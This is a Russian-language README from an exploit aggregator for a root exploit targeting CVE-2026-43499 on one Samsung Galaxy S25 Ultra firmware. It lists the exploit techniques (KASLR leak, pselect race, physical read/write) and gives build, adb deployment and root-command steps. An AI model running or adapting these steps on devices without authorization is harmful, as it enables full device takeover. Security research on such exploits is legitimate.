Sploitus

Exploit for CVE-2026-43499-S25U

kitploit · 2026-09-06

Exploit Code

MARKDOWN88 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-BUSUNG-DEV-CVE-2026-43499-S25U
# PoC для CVE-2026-43499 для Galaxy S25 Ultra

Доказательство концепции для конкретного устройства для CVE-2026-43499 на корейском Samsung Galaxy S25 Ultra.

## Поддерживаемая цель

root@kitploit:~
    
    
    Model: SM-S938N
    Codename: pa3q
    Android: 16 / API 36
    Build: S938NKSUACZF1
    Display ID: BP4A.251205.006.S938NKSUACZF1
    Fingerprint: samsung/pa3qksx/pa3q:16/BP4A.251205.006/S938NKSUACZF1_OKRACZF1:user/release-keys
    Kernel: 6.6.98-android15-8-pd6ff1cd-abogkiS938NKSUACZF1-4k
    Architecture: arm64 / 4K pages
    

Смещения и компоновки структур действительны только для указанной прошивки.

## Ссылка

Этот порт основан на:

  * NebuSec/CyberMeowfia — IonStack/CVE-2026-43499/exploit
  * Ревизия апстрима: `b850d3bddc74c3328d5fbcc0568d21962b55d949`



Лицензия Apache License 2.0 апстрима сохранена в LICENSE.

## Изменения порта

  * Добавлены смещения и компоновки ядра для `pa3q-S938NKSUACZF1`.
  * Добавлено восстановление сдвига KASLR на основе tracefs для этого ядра Samsung.
  * Портированы гонка pselect, этап CFI/FOPS и примитив физического чтения/записи.
  * Добавлен специфичный для устройства путь `system_unbound_wq` корневого помощника пользовательского режима.
  * Добавлены изолированные процессы повторных попыток с последовательностью задержек pselect, настроенной для устройства.
  * Сохраняет возвращенные страницы после успеха, чтобы избежать повторного использования живых поддельных объектов.



## Сборка

Установите `ANDROID_NDK_HOME` на Android NDK r29 или совместимый инструментарий:

root@kitploit:~
    
    
    make -j8
    

Результаты:

root@kitploit:~
    
    
    build/cve-2026-43499
    build/cve-2026-43499-root
    

## Развертывание и запуск

root@kitploit:~
    
    
    adb push build/cve-2026-43499 /data/local/tmp/cve-2026-43499
    adb push build/cve-2026-43499-root /data/local/tmp/cve-2026-43499-root
    adb shell chmod 755 /data/local/tmp/cve-2026-43499 /data/local/tmp/cve-2026-43499-root
    adb shell "LD_PRELOAD=/data/local/tmp/cve-2026-43499 /system/bin/true"
    adb shell "/data/local/tmp/cve-2026-43499-root -c 'id'"
    

Эксплойт по умолчанию использует 16 независимых попыток и базовую задержку pselect в 20 000 микросекунд. Переопределите их при сборе данных о времени:

root@kitploit:~
    
    
    adb shell "EXPLOIT_ATTEMPTS=24 PSELECT_DELAY_USEC=20000 LD_PRELOAD=/data/local/tmp/cve-2026-43499 /system/bin/true"
    

Временная сессия root и сохраненные выделения сохраняются до перезагрузки.

Для установки в один клик и поддержки KernelSU используйте Root My Galaxy.

Используйте только на устройствах, которые вам принадлежат или на тестирование которых вы получили явное разрешение.